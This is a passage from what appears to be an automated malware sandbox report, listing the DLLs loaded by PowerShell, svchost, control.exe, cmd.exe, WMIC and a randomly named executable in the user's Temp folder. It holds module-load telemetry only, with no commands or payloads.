Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.shell.servicehostbuilder.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\control.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\control.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\control.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\control.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\control.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\control.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\control.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\control.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\control.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\control.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\control.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\control.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\control.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\control.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\control.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\control.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\control.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\control.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\control.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\control.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\control.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\control.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\control.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\control.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
